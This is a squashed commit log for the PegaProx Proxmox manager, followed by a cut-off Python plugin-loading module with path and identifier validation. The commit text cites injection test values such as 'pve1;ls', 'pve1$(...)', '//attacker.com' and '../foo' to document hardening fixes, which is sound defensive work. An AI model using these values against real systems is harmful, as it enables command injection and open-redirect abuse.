MK (backend) - LW (UI) * monitoring: include Top Talkers + Rollups in Insights PDF export The two cards (75f6e58 Top Talkers, 953d38d Rollups) showed up on the Insights tab but the "Export PDF" button still only printed Capacity Forecast + Right-sizing. Now exports four sections: 1. Capacity Forecast (linear-reg ETA per metric) - existing 2. Top Talkers — uses the metric the user has open - NEW in the dropdown when they hit Export 3. Rollups — uses By-Tag / By-Pool depending - NEW on the user's current group_by toggle 4. Right-sizing recommendations - existing Subtitle now reads "Capacity Forecast · Top Talkers · Rollups · Right-sizing" so the printed report's header reflects all four. Empty sections are skipped (e.g. no rollups data → block isn't added). Same WinAnsi-safe sanitizer the existing blocks use; bytes are formatted via a local fmtBytesPdf so the PDF columns stay narrow. - MK (PDF block builders) - LW (column shape + i18n keys reuse) * security: defense-in-depth on monitoring endpoints (node-name + rollups cap) Two findings from a focused audit of this week's monitoring expansion. Neither has a known live exploit — both are defense-in-depth. (1) Node-name validation on /netstats, /cluster-health, /sensors These three new SSH-fronted endpoints take `node` from the URL and pass it into _get_node_ip(node), which interpolates into a PVE API URL. The SSH command strings themselves are static so shell-injection is already closed, but a crafted node like `pve1;ls` or `pve1$(...)` would still flow into the PVE URL construction and into log lines. Same vector vms.py:2718 closed back in April with a strict RFC-1035-ish regex. New helper _reject_bad_node() applies the identical pattern at each route entry. (2) Rollups response capped at 500 groups /insights/rollups returned one row per distinct tag (or pool) with no upper bound. A fleet with thousands of distinct tags (admin-driven or via a clumsy bulk-tag script) could return an unbounded payload. Added ?limit=N with clamp [1, 500] default 100, sorted by vm_count desc so the densest groups are kept. Response now also carries `truncated: bool` so the UI can show "showing X of Y" once we wire it. Verified live against localhost:5000: /nodes/pve1;ls/sensors → 400 Invalid node name /nodes/1pve/cluster-health → 400 Invalid node name (digit-led) /nodes/pve1/netstats → 502 graceful (SSH key missing in dev) /insights/rollups?limit=1000 → clamped to limit=500 - MK * perf: gevent-pool truthy bugfix + parallelise cluster-health + workers cap (A) — CRITICAL existing bug in run_concurrent gevent.pool.Pool overrides __bool__ to len(), so an empty pool is falsy. The check `if GEVENT_POOL and GEVENT_AVAILABLE` in the parallelisation helper was always-False on entry — every call silently fell through to the sequential branch since day one. The "5x faster dashboard" comment over the helper was aspiration, not reality. Fix: `is not None`. Both copies (utils/concurrent.py + the duplicate at core/manager.py:74) get the same fix. Isolated smoke against the helper: before: 7 × gevent.sleep(0.5) → 3.5s wall (sequential) after: 7 × gevent.sleep(0.5) → 0.5s wall (parallel) ✓ NOTE — there are 4 callsites in manager.py (1289, 1701, 11081, 15051) wrapping run_concurrent in their own `if GEVENT_AVAILABLE and GEVENT_POOL:` check with the same bug. Those have been sequential by accident; left as-is for now since flipping them parallel could surface latent races in the called code. Tracked for a focused follow-up. (B) — F5: parallelise get_node_cluster_health 7 SSH calls corosync-cfgtool + pvecm + 5x systemctl ran sequentially at 8s per timeout = up to 56s blocking one gevent worker. Now spawned via run_concurrent_dict with 12s overall cap. Parser bugfix while in there: corosync-cfgtool uses `key = value` not `key: value`, so the status field was being stored as "status = active" verbatim. `addr =` was already handled with the right split; extended the same pattern to status. (C) — F3: PEGAPROX_WORKERS default cap 8 -> 16 With (A) making fanouts actually parallel, the bottleneck shifts to worker count when /health + /vms-backup-status + dashboard refresh fire concurrently. 16 raises the ceiling; PEGAPROX_WORKERS env var still wins. - MK * perf: parallelise /health + /vms-backup-status fanouts (F1) Both endpoints were sequential per-node fanouts that pinned a gevent worker for 10+ seconds per call. They're dashboard-polled every 10-20s, so they were the main reason a 4-worker default chewed up the pool and starved SSE during peak load. F1a — /health storage scan for node in ns.keys(): mgr.get_storage_list(node) → run_concurrent_dict({node: lambda: mgr.get_storage_list(node)}) Only ONLINE nodes scanned (n.status in {online, running}) — dead nodes would otherwise park joinall at the full timeout; sequential code happened to mask this because per-call connect-fail was fast, parallel waits the slowest. Net would have been WORSE without this filter on degraded clusters. F1b — /vms-backup-status PBS + PVE scan Both nested loops were sequential. Refactored into: 1) per-PBS task = scan one PBS server's datastores + snapshots → list of (vmid, ts, encrypted, verified_ts) tuples 2) per-node task = scan one PVE node's backup-content → same tuple shape 3) run_concurrent_dict over all tasks (timeout 8s) 4) sequentially _bump from results into by_vm Separating I/O (parallel) from state mutation (sequential) avoids needing a lock around the shared by_vm dict. Also filters to ONLINE nodes only. E2E live timing on dev (one connected cluster, one dead corosync member dragging /nodes calls): /vms-backup-status: 10.4s → 0.45s (22× faster) ✓ /health: 10.5s → 16s (mixed — F1a portion works, remaining 16s is upstream get_node_status() blocking 2× 10s on the dead member. That's pre-existing _get_node_ip behaviour, not introduced by this commit. Healthy clusters will see the full storage-fanout win.) Both endpoints' response shapes verified unchanged. - MK * perf: fix last inline GEVENT_POOL truthy-check (manager.py:1294) Paired with the run_concurrent helper bugfix in 8af4a2d. Of the 4 callsites that wrap fanouts in their own `if GEVENT_AVAILABLE and GEVENT_POOL:` check, only this one (get_cluster_status_summary's per-node fetch_node_details fanout) had the inline check too — the other 3 (1701, 11081, 15051) call run_concurrent directly, so the helper fix already wired them up parallel. Fanout callbacks here are pure PVE-API reads returning tuples; shared-state writes happen sequentially after joinall under the ip-cache lock. Race-safe by design — confirmed by code review of all 4 sites before flipping. E2E live timing on the dev env: /health 16s → 8s — get_node_status fanout now parallel /vms-backup-status — stayed at ~450ms (F1b already had it) Plus a comprehensive 32-check E2E self-test ran clean: auth + cluster basics + 7 pre-existing endpoints (regression) + all 5 top-talkers metrics + both rollups grouping + limit clamp + security gates (400 on bad node-name) + 3 monitoring endpoints + 4 shape-preservation checks. 32 passed, 0 failed. - MK * security: defense-in-depth on today's perf commits Re-audit of 8af4a2d / 9d2f925 / 5b51da2 / a79d2eb. No live exploit found but two belt-and-suspenders hardenings worth landing: (D1) get_node_cluster_health — shlex.quote the svc name before interpolating into the systemctl shell command sent over SSH. SERVICES is a hardcoded allow-list today so injection isn't reachable now, but if the list ever moves into config/runtime the un-quoted f-string would be RCE on the PVE node. Quote makes the call site future-proof regardless of where the value comes from. (D2) PVE-returned node + storage names get the RFC-1035-ish regex check at the boundary before flowing into URL paths. PVE itself controls these but if PVE were ever compromised, a crafted name like `../foo` would let it pivot into other PVE namespaces. Mirrors api/nodes.py:_NODE_NAME_RE that we already apply on user-supplied node names. Applied at three sites: - clusters.py /health storage fanout (F1a) - pbs.py /vms-backup-status _scan_node (F1b) - pbs.py _scan_node store_name (F1b inner loop) Verified live against localhost:5000 (one connected cluster, one dead corosync member). 18-check sweep ran clean: cluster-health still returns the same 5 services with identical names after shlex.quote(); /health still scores the same 2 healthy factors (nodes + storage) after the regex filter — no over-restriction. All top-talkers metrics, both rollups groupings, and 5 pre-existing endpoints still respond 200. - MK * perf: workers = max(8, cpu_count*4) + actually plumb the pool Two fixes in one — PEGAPROX_WORKERS was a startup-log lie before: (A) Lie label exposed `_start_gevent_server` printed "Starting PegaProx with Gevent WSGIServer (N greenlets)" but the `workers` value was NEVER passed to WSGIServer's `spawn=` parameter. gevent.pywsgi defaults to unlimited greenlets when spawn is unset — so the previous `min(cpu*2, 8)` / `min(cpu*2, 16)` defaults capped nothing in practice. F3 from 8af4a2d only changed the log message. Fixed: server_kwargs['spawn'] = Pool(workers). Per-request handler greenlets are now actually capped; per-request fanouts (storage scan, PBS scan, SSH calls) still spawn inside their own request handler as before. (B) Auto-scale formula Old: min(cpu_count*2, 16) — capped huge customer boxes at 16 New: max(8, cpu_count*4) — proper CPU-driven scaling 1c VM: 8 workers (floor for tiny VMs) 4c: 16 workers (= old default on this size) 8c: 32 workers 12c: 48 workers (verified live on this dev box) 32c: 128 workers 64c: 256 workers gevent greenlets are KB-stack-cheap so 100s per host are fine. PEGAPROX_WORKERS env override still wins. Verified live on a 12-core dev box: Startup log: "12 CPU cores detected ... 48 greenlets" ✓ 20 parallel curl -> /tasks completed in 48ms wall ✓ /auth/check + /health still respond 200 ✓ - MK * security: defense-in-depth audit pass 3 — three findings closed Whole-codebase sweep beyond the perf-commit follow-up. Three real issues surfaced. (1) MIGRATE-SQL — v0.9.10.1 half-applied hotfix v0.9.10.1 added _safe_quote_ident() and applied it to _row_counts_encrypted (line 280). _row_counts_plain at line 262 was missed — same f-string-table-name-into-SELECT pattern. Now routed through the same whitelist+quote helper. Threat model is restore-from-untrusted-backup; exploitability nil in normal use, defense-in-depth no-go regardless. (2) OPEN-REDIRECT — OIDC redirect_after `request.args.get('redirect_after').startswith('/')` accepted `//attacker.com` (protocol-relative URL) which the browser resolves as offsite. Same bug in the frontend client at web/src/auth.js. New _safe_internal_path() requires single leading /, rejects // and /\\, rejects CR/LF/TAB/backslash, caps length at 200. Mirrored client-side. Net: redirect_after is now strictly an internal SPA route. (3) MASS-ASSIGNMENT — PBS notification create/update create_notification_target / update_notification_target / create_notification_matcher / update_notification_matcher all pumped `**kwargs` straight into PBS API body. An admin with notification-manage perm could inject arbitrary field names PBS might silently store in /etc/proxmox-backup/notifications.cfg. New _sanitize_pbs_kwargs whitelist filters by: - key matches ^[a-z][a-z0-9-]{0,30}$ (PBS/PVE convention) - value is str/int/bool or None - lists of scalars allowed (PBS array-as-CSV pattern) Forward-compatible with new PBS fields. The traffic_control CRUD methods below already had explicit per-field whitelisting; this brings notifications inline. E2E verified via unit-smoke against both helpers: _sanitize_pbs_kwargs: 8 assertions (legitimate / control-char / uppercase / dict-value / dunder-prefix / over-30-char / list- scalars / list-with-object). ALL pass. _safe_internal_path: 6 assertions (valid / //attacker / /\\evil / CRLF / non-string / too-long). ALL pass. What was confirmed clean (no fix needed): session cookies have Secure+HttpOnly+SameSite; key files chmod 0600 on write; OIDC URL goes through sanitize_outbound_url; audit-search has limit/offset clamps; no plaintext secrets in logging calls. Documented in the log so the next audit pass doesn't re-investigate these. Outstanding (parked, not addressed in this commit): - ~24 sites returning raw `str(e)` to client — should go through safe_error(). Big refactor, separate pass. - OIDC verify_iss=False — documented behaviour, audience claim check still active; recommend in-code comment clarifying the accept-all-issuer policy. - MK * security: route all client error responses through safe_error() The defense-in-depth audit (5929e01) parked 24 sites returning raw str(e) to the client as a known info-leak surface. This commit closes that pass — 25 sites total across 11 files, including the ceph.py rbd-SSH tuple-return path I missed in the original audit count. Pattern was: return jsonify({'error': str(e)}), 500 which leaks stack-trace fragments, internal paths, library internals (paramiko exceptions, sqlite errors, PVE error bodies) straight back to whoever hit the endpoint. safe_error() in api/helpers.py logs the full exception via logging.error(exc_info) and returns a generic message to the client. Operators still get the trace in pegaprox.log. Per-file count + import added where missing: pbs.py 5 sites (existing safe_error refs) push.py 5 sites + import added vms.py 5 sites (incl. 2 f-string variants: "SSH error: {str(e)}" and "Connection failed: {str(e)}" — rerouted with default_msg arg) users.py 3 sites (user-folder CRUD) ceph.py 1 site (rbd-SSH tuple-return at line 147) alerts.py 2 sites (one was missed by an earlier scan) insights.py 1 site + import expanded plugins.py 1 site + import added clusters.py 1 site settings.py 1 site (status-page plugin proxy) storage.py 1 site (storage identity passthrough) Total: 25 sites cleaned, 0 raw str(e) returns left in pegaprox/api/ or pegaprox/background/ (verified by re-running the audit grep). E2E sweep on the running dev server: 12/12 endpoints across the 11 touched files responded 200 OK after refactor. No regression in response shape — only the exception-message field is generalised. Outstanding: OIDC verify_iss=False still wants a code-comment clarifying the accept-all-issuer policy. Pure documentation, separate commit. - MK * sse: stability — json default=str + reconnect-log backoff Two thin failure modes I spotted while auditing the SSE plumbing for "why does it sometimes die" — both small, both real, both target observability/durability rather than throughput. (1) broadcast_sse json.dumps without default= A caller passing a datetime / set / bytes / custom-object in `data` would raise TypeError inside json.dumps, get swallowed by the outer try/except, and the broadcast would silently disappear — no log, no signal to operators. That's exactly the shape of the #413 layer 1 bug (wrong arg shape killed the publisher) just with a different trigger. Now: - json.dumps gets default=str so common Python objects coerce - inner try/except logs the update_type + cluster_id + error so the next time a caller breaks, ops can find it fast Smoke-tested with datetime/set/bytes (survived) and a custom __str__-raises object (logged + dropped, broadcaster healthy). (2) reconnect-log INFO spam A dead cluster generated an INFO entry every 10s ("is disconnected, attempting reconnect...") → ~360 INFO entries per hour per dead cluster. Operators watching the log for actual events got drowned out. Now backoff: INFO on attempt #1 + every 50th (~8min cadence) for ongoing visibility; DEBUG in between. Reconnect cadence itself is unchanged at 10s. Successful-reconnect line stays INFO with "after N attempts" so it's clear how long the outage was. `_reconnect_attempt_count` resets to 0 on reconnect success. Not addressed (deliberately scoped out): - _vmw_watched memory: false alarm, self-trims at 2min idle - Per-client put_nowait drop visibility: nice-to-have, not on today's path - Per-cluster threading.Thread spawn per loop: gevent monkey- patches to a greenlet so it's cheap; not a real bottleneck E2E verified: server restarted clean, SSE stream opened via /api/sse/token then /api/sse/updates?token=<t>, received 'connected' + live 'tasks' events for both connected clusters. No regression to broadcaster cadence. - MK * sse: shrink dark-window after cluster reconnect (target <30s SLA) Two-part tightening of the recover-to-UI-visible window so a cluster (or single node) coming back online surfaces in the dashboard within a worst-case ~30s instead of drifting toward 60s+. (1) On successful connect_to_proxmox(), push a fresh metrics broadcast immediately + clear any pending _sse_cooldown_until. Previously the reconnected cluster waited up to one full broadcast-loop tick (1s) plus any pre-existing cooldown before the UI flipped to "online" — even though the connection was already back. Now: reconnect → metrics pushed in the same iteration. (2) Error-cooldown 15s → 10s on get_tasks / get_node_status failure paths. Cooldown gates broadcasts while a host is flaky, so a 15s cooldown means up to 15s of dark UI per cycle. On a marginally-recovering cluster that hits two cooldown cycles in a row, dark-window stretches to 30s. With 10s the worst-case two-cycle stretch is 20s, leaving comfortable headroom under a 30s SLA. Combined with the existing 10s reconnect-retry cadence + 1s broadcast loop, the recovery story is now: - healthy cluster, single node bounces: UI sees green within 1-2s (per-loop get_node_status broadcast) - cluster TCP-unreachable, returns within seconds: UI sees green within 10-20s (reconnect retry + fresh-metrics push) - cluster slow-recovering (multiple cooldown cycles before stable): worst case ~30s Per-cluster fan-out via threading.Thread (gevent-patched to greenlet) still has the 8s join-timeout, so one slow cluster can't drag the others. E2E note: dev cluster came back clean after restart; SSE stream open, heartbeat + tasks events flowing. No regression to the broadcaster cadence or shape. - MK * docs: clarify why OIDC verify_iss is intentionally False Last finding from the defense-in-depth audit pass (5929e01 noted this as a follow-up). Pure documentation — no logic change. `verify_iss=False` in the pyjwt.decode call has been flagged by multiple SAST scanners as a missing claim check. It is intentional: - Real-world IdPs return inconsistent `iss` values relative to the operator-configured authority URL (trailing slash, host vs FQDN, http vs https on internal IdPs). - Signature verification ALREADY binds the token to the configured authority — `signing_key` is fetched from the JWKS endpoint at that authority, so a token signed elsewhere fails before any claim is read. - `verify_aud=True` + `audience=accepted` keeps audience-claim binding. - Nonce check on the next line covers replay. The next person reading this code (or running SAST) shouldn't have to re-derive the same conclusion or accidentally flip it to True and break Authentik/Keycloak/Entra logins. - MK * release: bump build date 2026.05.30 → 2026.05.31 The version-bump landed yesterday but 23 commits worth of monitoring expansion + perf hardening + defense-in-depth + safe_error refactor + SSE-stability + OIDC doc went on top today. Update build date so the snapshot accurately reflects "this is the May 31 release-prep". Version itself (0.9.12.0) unchanged. - MK * fix(cluster-health): hide 5 empty '?' service cards when SSH unavailable Nico's eyeball test on Testing today: Cluster Health panel rendered the 5 PVE services (pveproxy / pvedaemon / pve-cluster / corosync / pvestatd) each with "?" as ActiveState because the dev-env's PegaProx user has no SSH key to the PVE nodes. Visual noise that looked like a half-broken integration. Backend (core/manager.py get_node_cluster_health): After running the 7 SSH calls via run_concurrent_dict, set ssh_unavailable=True if EVERY block came back empty: corosync is None AND pvecm is None AND every service.active is None. The 5-row services array stays for shape compatibility — UI decides what to do with it. Frontend (node_modals.js): If ssh_unavailable: render a single italic explainer: "Cluster Health needs SSH access to the node from PegaProx (corosync-cfgtool, pvecm, systemctl). Configure the cluster's Node-Shell SSH credentials and refresh." Otherwise: render the data we have. The services grid now also filters out rows where active is null (defensive — won't show '?' cards even on partial SSH success). i18n: clusterHealthSshMissing in DE/EN/FR/ES/PT/KO/IT (7 strings). E2E verified on dev (no SSH key): /cluster-health now returns ssh_unavailable=true. UI explainer visible instead of '?' cards. In customer installs with Node-Shell credentials configured this flag stays false and the original data layout renders unchanged. - MK --------- Co-authored-by: mkellermann97 <marcus.kellermann@pegaprox.com> Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> Co-authored-by: Florian Paul Azim Hoberg <florian.hoberg@credativ.de> Co-authored-by: gyptazy <4150400+gyptazy@users.noreply.github.com> Co-authored-by: Davin Kevin <davin.kevin@gmail.com>
510 lines
20 KiB
Python
510 lines
20 KiB
Python
# -*- coding: utf-8 -*-
|
|
"""
|
|
PegaProx Plugin Management API - Layer 6
|
|
NS: Mar 2026 - auto-discover plugins from plugins/ dir, enable/disable via Settings
|
|
|
|
Plugins register route handlers via register_plugin_route() which are dispatched
|
|
through a single catch-all Flask route. This avoids Flask's restriction on
|
|
registering blueprints after the first request — plugins can be loaded at runtime.
|
|
"""
|
|
|
|
import json
|
|
import re
|
|
import sys
|
|
import threading
|
|
import logging
|
|
import importlib.util
|
|
from pathlib import Path
|
|
from datetime import datetime
|
|
from flask import Blueprint, jsonify, request, current_app
|
|
|
|
from pegaprox.constants import PLUGINS_DIR
|
|
from pegaprox.globals import *
|
|
from pegaprox.models.permissions import ROLE_ADMIN
|
|
from pegaprox.core.db import get_db
|
|
from pegaprox.utils.auth import require_auth
|
|
from pegaprox.utils.audit import log_audit
|
|
from pegaprox.api.helpers import safe_error
|
|
|
|
bp = Blueprint('plugins', __name__)
|
|
|
|
# NS May 2026 (#381 pentest) — strict path-segment whitelist for frontend_route
|
|
# values. One segment between slashes; alphanumerics + . _ - only.
|
|
_SAFE_PATH_SEG = re.compile(r'^[A-Za-z0-9_.-]+$')
|
|
|
|
# in-memory registries — guarded by _plugin_lock to prevent
|
|
# "dictionary changed size during iteration" crashes that made plugins
|
|
# appear to vanish under load (several users reported this).
|
|
_plugin_lock = threading.RLock()
|
|
_loaded_plugins = {} # {plugin_id: module}
|
|
_plugin_routes = {} # {plugin_id: {path: handler_fn}}
|
|
|
|
|
|
# NS Apr 2026 — CodeQL flagged plugin_id as a path-injection vector (admin-only
|
|
# endpoints but still). Every endpoint below now passes plugin_id through this
|
|
# validator before touching the filesystem. Allowed chars match what
|
|
# `_discover_plugins` accepts — directory-name-safe ASCII only, no dots.
|
|
import re as _re
|
|
_PLUGIN_ID_RE = _re.compile(r'^[a-z0-9][a-z0-9_-]{0,63}$')
|
|
|
|
def _valid_plugin_id(pid):
|
|
return isinstance(pid, str) and bool(_PLUGIN_ID_RE.match(pid))
|
|
|
|
|
|
# ---- Plugin Route Registration (used by plugins) ----
|
|
|
|
def register_plugin_route(plugin_id, path, handler):
|
|
"""Register a route handler for a plugin. Called from plugin's register() function."""
|
|
with _plugin_lock:
|
|
_plugin_routes.setdefault(plugin_id, {})[path] = handler
|
|
|
|
|
|
# ---- Catch-all route for plugin API calls ----
|
|
|
|
@bp.route('/api/plugins/<plugin_id>/api/<path:subpath>', methods=['GET', 'POST', 'PUT', 'DELETE'])
|
|
@require_auth(perms=['plugins.view'])
|
|
def plugin_proxy(plugin_id, subpath):
|
|
"""Dispatch API requests to loaded plugins"""
|
|
if not _valid_plugin_id(plugin_id):
|
|
return jsonify({'error': 'Invalid plugin id'}), 400
|
|
with _plugin_lock:
|
|
if plugin_id not in _loaded_plugins:
|
|
return jsonify({'error': 'Plugin not loaded'}), 404
|
|
handler = _plugin_routes.get(plugin_id, {}).get(subpath)
|
|
|
|
if not handler:
|
|
return jsonify({'error': f'Route not found: {subpath}'}), 404
|
|
|
|
try:
|
|
result = handler()
|
|
if isinstance(result, dict) or isinstance(result, list):
|
|
return jsonify(result)
|
|
return result
|
|
except Exception as e:
|
|
logging.error(f"[PLUGINS] {plugin_id}/{subpath} error: {e}")
|
|
return jsonify({'error': 'Plugin request failed'}), 500
|
|
|
|
|
|
# ---- Discovery & State ----
|
|
|
|
def _discover_plugins():
|
|
"""Scan plugins/ dir for subfolders with manifest.json"""
|
|
found = []
|
|
plugins_path = Path(PLUGINS_DIR)
|
|
if not plugins_path.exists():
|
|
return found
|
|
|
|
for d in sorted(plugins_path.iterdir()):
|
|
if not d.is_dir() or d.name.startswith(('_', '.')):
|
|
continue
|
|
manifest_file = d / 'manifest.json'
|
|
if not manifest_file.exists():
|
|
continue
|
|
try:
|
|
with open(manifest_file, 'r') as f:
|
|
meta = json.load(f)
|
|
meta['_id'] = d.name
|
|
meta['_dir'] = str(d)
|
|
meta['_has_init'] = (d / '__init__.py').exists()
|
|
found.append(meta)
|
|
except Exception as e:
|
|
logging.warning(f"[PLUGINS] Bad manifest in {d.name}: {e}")
|
|
found.append({
|
|
'_id': d.name, '_dir': str(d), '_has_init': False,
|
|
'name': d.name, 'error': f'Invalid manifest: {e}'
|
|
})
|
|
|
|
return found
|
|
|
|
|
|
def _get_plugin_states():
|
|
db = get_db()
|
|
rows = db.query('SELECT plugin_id, enabled, loaded_at, error FROM plugin_state') or []
|
|
return {r['plugin_id']: dict(r) for r in rows}
|
|
|
|
|
|
def _set_plugin_state(plugin_id, enabled, error=''):
|
|
db = get_db()
|
|
now = datetime.now().isoformat()
|
|
existing = db.query_one('SELECT plugin_id FROM plugin_state WHERE plugin_id = ?', (plugin_id,))
|
|
if existing:
|
|
db.execute('UPDATE plugin_state SET enabled = ?, loaded_at = ?, error = ? WHERE plugin_id = ?',
|
|
(1 if enabled else 0, now, error, plugin_id))
|
|
else:
|
|
db.execute('INSERT INTO plugin_state (plugin_id, enabled, loaded_at, error) VALUES (?, ?, ?, ?)',
|
|
(plugin_id, 1 if enabled else 0, now, error))
|
|
|
|
|
|
# ---- Loading ----
|
|
|
|
def load_plugin(app, plugin_id):
|
|
"""Load a plugin module and call its register() function
|
|
WARNING: Plugins execute arbitrary Python with full process privileges.
|
|
Only load plugins from trusted sources. There is no sandbox.
|
|
NS Apr 2026: idempotent — if already loaded, return success without re-registering."""
|
|
# NS May 2026 (Aikido SAST hardening) — defense-in-depth on plugin_id.
|
|
# All API entry points already validate via _valid_plugin_id, but if a
|
|
# future caller bypasses that we still refuse a path-traversal name here.
|
|
if not _valid_plugin_id(plugin_id):
|
|
return False, 'Invalid plugin id'
|
|
# idempotency — re-enable clicks used to double-register routes
|
|
with _plugin_lock:
|
|
if plugin_id in _loaded_plugins:
|
|
return True, ''
|
|
|
|
plugins_root = Path(PLUGINS_DIR).resolve()
|
|
plugin_dir = (plugins_root / plugin_id).resolve()
|
|
# belt + suspenders: ensure resolved path is still under plugins/.
|
|
try:
|
|
plugin_dir.relative_to(plugins_root)
|
|
except ValueError:
|
|
return False, 'Plugin path escapes plugins root'
|
|
init_file = plugin_dir / '__init__.py'
|
|
|
|
if not init_file.exists():
|
|
return False, 'No __init__.py found'
|
|
|
|
# NS: check manifest for trusted flag — warn if missing
|
|
manifest_path = plugin_dir / 'manifest.json'
|
|
is_trusted = False
|
|
if manifest_path.exists():
|
|
try:
|
|
with open(manifest_path) as f:
|
|
manifest = json.load(f)
|
|
is_trusted = manifest.get('author', '').startswith('PegaProx')
|
|
except Exception:
|
|
pass
|
|
if not is_trusted:
|
|
logging.warning(f"[PLUGINS] [SECURITY] Loading UNTRUSTED plugin '{plugin_id}' — not authored by PegaProx Team. Review code before use!")
|
|
# MK: Apr 2026 — security audit: plugins run with FULL process privileges, no sandbox
|
|
# this is by design (like Grafana/Jenkins plugins) but must be documented
|
|
from pegaprox.utils.audit import log_audit
|
|
try: log_audit('system', 'plugin.load', f"Plugin '{plugin_id}' loaded (trusted={is_trusted})")
|
|
except: pass
|
|
|
|
try:
|
|
mod_name = f'plugins.{plugin_id}'
|
|
spec = importlib.util.spec_from_file_location(mod_name, init_file)
|
|
mod = importlib.util.module_from_spec(spec)
|
|
sys.modules[mod_name] = mod
|
|
spec.loader.exec_module(mod)
|
|
|
|
# plugin calls register_plugin_route() inside register()
|
|
if hasattr(mod, 'register'):
|
|
mod.register(app)
|
|
|
|
with _plugin_lock:
|
|
_loaded_plugins[plugin_id] = mod
|
|
logging.info(f"[PLUGINS] Loaded: {plugin_id}")
|
|
return True, ''
|
|
|
|
except Exception as e:
|
|
logging.error(f"[PLUGINS] Failed to load {plugin_id}: {e}")
|
|
# roll back partial state — a register() that half-succeeded can leave
|
|
# stale routes referencing a module we're about to drop
|
|
with _plugin_lock:
|
|
_plugin_routes.pop(plugin_id, None)
|
|
_loaded_plugins.pop(plugin_id, None)
|
|
if f'plugins.{plugin_id}' in sys.modules:
|
|
del sys.modules[f'plugins.{plugin_id}']
|
|
return False, str(e)
|
|
|
|
|
|
def unload_plugin(plugin_id):
|
|
"""Unload a plugin — remove routes and module"""
|
|
with _plugin_lock:
|
|
_plugin_routes.pop(plugin_id, None)
|
|
_loaded_plugins.pop(plugin_id, None)
|
|
mod_name = f'plugins.{plugin_id}'
|
|
if mod_name in sys.modules:
|
|
del sys.modules[mod_name]
|
|
logging.info(f"[PLUGINS] Unloaded: {plugin_id}")
|
|
|
|
|
|
def load_enabled_plugins(app):
|
|
"""Called once at startup — load all enabled plugins"""
|
|
states = _get_plugin_states()
|
|
discovered = _discover_plugins()
|
|
|
|
loaded = []
|
|
for plugin in discovered:
|
|
pid = plugin['_id']
|
|
state = states.get(pid, {})
|
|
if state.get('enabled'):
|
|
ok, err = load_plugin(app, pid)
|
|
if ok:
|
|
loaded.append(plugin.get('name', pid))
|
|
# clear any old error from the DB
|
|
_set_plugin_state(pid, True, error='')
|
|
else:
|
|
# keep enabled flag so user still sees the intent, record error for UI
|
|
_set_plugin_state(pid, True, error=err)
|
|
|
|
if loaded:
|
|
logging.info(f"[PLUGINS] {len(loaded)} plugin(s) loaded: {', '.join(loaded)}")
|
|
|
|
|
|
def start_plugin_backgrounds():
|
|
# snapshot under lock to avoid "dictionary changed size during iteration"
|
|
with _plugin_lock:
|
|
plugins_snapshot = list(_loaded_plugins.items())
|
|
for pid, mod in plugins_snapshot:
|
|
if hasattr(mod, 'start_background_tasks'):
|
|
try:
|
|
mod.start_background_tasks()
|
|
logging.info(f"[PLUGINS] Background tasks started for {pid}")
|
|
except Exception as e:
|
|
logging.error(f"[PLUGINS] Background task failed for {pid}: {e}")
|
|
|
|
|
|
# ---- API Routes ----
|
|
|
|
@bp.route('/api/plugins', methods=['GET'])
|
|
@require_auth(perms=['plugins.view'])
|
|
def list_plugins():
|
|
"""List all discovered plugins with their enabled/disabled state"""
|
|
discovered = _discover_plugins()
|
|
states = _get_plugin_states()
|
|
|
|
result = []
|
|
# snapshot the registries so the list is consistent even if enable/disable runs mid-request
|
|
with _plugin_lock:
|
|
loaded_snapshot = set(_loaded_plugins.keys())
|
|
routes_snapshot = {k: list(v.keys()) for k, v in _plugin_routes.items()}
|
|
|
|
for plugin in discovered:
|
|
pid = plugin['_id']
|
|
state = states.get(pid, {})
|
|
# NS May 2026 (#381) — surface the manifest's frontend hook so the
|
|
# dashboard can build a plugin tab without core changes per plugin.
|
|
# Sanitize: route must be a string starting with /api/plugins/<pid>/
|
|
# so a malicious manifest can't redirect the iframe to an external host.
|
|
has_frontend = bool(plugin.get('has_frontend', False))
|
|
raw_route = plugin.get('frontend_route', '')
|
|
frontend_route = ''
|
|
# NS May 2026 (#381) — strict route validation. Accept either:
|
|
# 1. fully-qualified plugin path: /api/plugins/<pid>/api/...
|
|
# 2. pure relative form: 'ui' or 'admin/dash' → scoped under us
|
|
# Reject anything else: external URLs, protocol-relative, absolute
|
|
# paths to other plugins, leading slash, control chars, query/fragment.
|
|
# NS May 2026 (pentest follow-up) — additionally reject anything with
|
|
# control chars (CRLF/null/tab), URL semantics (?, #, %, \), or
|
|
# parent-segment traversal (..). These would otherwise land verbatim
|
|
# in the iframe src and could enable URL/header injection downstream.
|
|
def _is_safe_relative_path(s):
|
|
if not s or not isinstance(s, str): return False
|
|
if any(ord(c) < 0x20 or ord(c) == 0x7f for c in s): return False
|
|
for bad in ('?', '#', '%', '\\', '*', ':', ' ', '\t'):
|
|
if bad in s: return False
|
|
for seg in s.split('/'):
|
|
if not seg or seg in ('..', '.'): return False
|
|
if not _SAFE_PATH_SEG.match(seg): return False
|
|
return True
|
|
|
|
if has_frontend and isinstance(raw_route, str):
|
|
expected_prefix = f'/api/plugins/{pid}/'
|
|
if raw_route.startswith(expected_prefix):
|
|
tail = raw_route[len(expected_prefix):]
|
|
if _is_safe_relative_path(tail):
|
|
frontend_route = raw_route
|
|
else:
|
|
has_frontend = False
|
|
elif raw_route and _is_safe_relative_path(raw_route):
|
|
# 'ui' → /api/plugins/<pid>/api/ui — matches register_plugin_route()
|
|
frontend_route = f'/api/plugins/{pid}/api/{raw_route}'
|
|
else:
|
|
has_frontend = False
|
|
else:
|
|
# non-string routes (number, dict, list, None) → drop entirely
|
|
has_frontend = False
|
|
result.append({
|
|
'id': pid,
|
|
'name': plugin.get('name', pid),
|
|
'version': plugin.get('version', ''),
|
|
'author': plugin.get('author', ''),
|
|
'description': plugin.get('description', ''),
|
|
'enabled': bool(state.get('enabled', 0)),
|
|
'loaded': pid in loaded_snapshot,
|
|
'error': state.get('error', '') or plugin.get('error', ''),
|
|
'has_init': plugin.get('_has_init', False),
|
|
'routes': routes_snapshot.get(pid, []),
|
|
'trusted': plugin.get('author', '').startswith('PegaProx'),
|
|
'has_frontend': has_frontend,
|
|
'frontend_route': frontend_route,
|
|
})
|
|
|
|
return jsonify(result)
|
|
|
|
|
|
@bp.route('/api/plugins/<plugin_id>/reload', methods=['POST'])
|
|
@require_auth(perms=['plugins.manage'])
|
|
def reload_plugin(plugin_id):
|
|
"""Force-reload a plugin (unload + load). Helps when a plugin crashed
|
|
and the user wants to retry without a full server restart."""
|
|
if not _valid_plugin_id(plugin_id):
|
|
